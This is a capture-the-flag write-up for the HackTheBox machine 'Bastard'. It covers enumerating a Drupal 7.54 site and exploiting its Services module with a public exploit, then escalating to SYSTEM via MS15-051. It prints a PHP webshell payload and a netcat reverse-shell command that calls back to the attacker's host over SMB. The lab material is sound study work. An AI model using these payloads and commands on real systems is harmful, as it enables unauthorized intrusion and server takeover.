Bastard
A medium box from HackTheBox, use a vulnerability in a Drupal plugin to get initial access, then a kernel exploit for privesc.
Recon
Regular nmap
sudo nmap -sC -sV -oA nmap/init 10.10.10.9
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
On port 80 find a Drupal instance, running Drupal 7
Next up, gobuster for directories
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt --url http://10.10.10.9
Dont find anything interesting immediately, but the presence of /rest/ will be important later
Then gobuster for files
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt --url http://10.10.10.9
And find a /changelog.txt on the webroot, exposing that the version of Drupal is 7.54
Running a more specific scan, run droopescan to enumerate the plugins running on the server
droopescan scan drupal -u 10.10.10.9
This one takes year to complete, but eventually get the output
[+] Themes found:
seven http://10.10.10.9/themes/seven/
garland http://10.10.10.9/themes/garland/
[+] Possible interesting urls found:
Default changelog file - http://10.10.10.9/CHANGELOG.txt
Default admin - http://10.10.10.9/user/login
[+] Possible version(s):
7.54
[+] Plugins found:
ctools http://10.10.10.9/sites/all/modules/ctools/
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/ctools/changelog.txt
http://10.10.10.9/sites/all/modules/ctools/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/ctools/LICENSE.txt
http://10.10.10.9/sites/all/modules/ctools/API.txt
libraries http://10.10.10.9/sites/all/modules/libraries/
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.txt
http://10.10.10.9/sites/all/modules/libraries/changelog.txt
http://10.10.10.9/sites/all/modules/libraries/CHANGELOG.TXT
http://10.10.10.9/sites/all/modules/libraries/README.txt
http://10.10.10.9/sites/all/modules/libraries/readme.txt
http://10.10.10.9/sites/all/modules/libraries/README.TXT
http://10.10.10.9/sites/all/modules/libraries/LICENSE.txt
services http://10.10.10.9/sites/all/modules/services/
http://10.10.10.9/sites/all/modules/services/README.txt
http://10.10.10.9/sites/all/modules/services/readme.txt
http://10.10.10.9/sites/all/modules/services/README.TXT
http://10.10.10.9/sites/all/modules/services/LICENSE.txt
image http://10.10.10.9/modules/image/
profile http://10.10.10.9/modules/profile/
php http://10.10.10.9/modules/php/
[+] Scan finished (0:35:53.627982 elapsed)
Then when running searchsploit with drupal, see an exploit involving Drupal 7.x and the services plugin
searchsploit drupal 7
...
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
...
Exploitation
Download the exploit to the current directory
searchsploit -m php/webapps/41564.php
FIring it immediately , it oesn’t work with -h or giving it a target - so read up on it using the writeup link inside the file
At the end of the writeup, the authors write - “…one has to guess or find the endpoint URL, which mitigates the vulnerability a bit”
So inside the file need to change the endpoint variable from “endpoint_path=/rest_endpoint” to the one that we found in the gobuster enumeration - “enpoint_path=/rest”
Since the exploit writes a file to the web root, can change the default php file to a webshell
Changing
$file = [
'filename' => 'dixuSOspsOUU.php',
'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];
To
$file = [
'filename' => 'rev.php',
'data' => '<?php system($_GET[\'cmd\']); ?>'
];
Then change the target IP within the file as well
$url = http://IP;
Then fire the exploit with
php 41564.php
Now with the webshell, can use the windows version of netcat, nc.exe, to get reverse shell
Copying nc.exe to the working directory, then using the impacket smbscript to access it from the target via webshell
/opt/impacket/examples/smbserver.py share .
And then use the webshell to get a reverse shell by setting up a netcat listener on port 4444 and going to
http://10.10.10.9/rev.php?cmd=\\KALI_IP\share\nc.exe -e cmd.exe KALI_IP 4444
To catch the reverse shell and get the user flag
Now on the box, run systeminfo and see that there are no hotfixes applied to the box, so a kernel exploit should be easy
Ill opt to use MS15-051, since its easy and has a executable ready to go off github
Transferring it to the victim via SMB Server again, run it with cmd.exe as the command to run as nt authority\system to get root!
C:\inetpub\drupal-7.54> exploit.exe cmd.exe
C:\inetpub\drupal-7.54> whoami
nt authority\system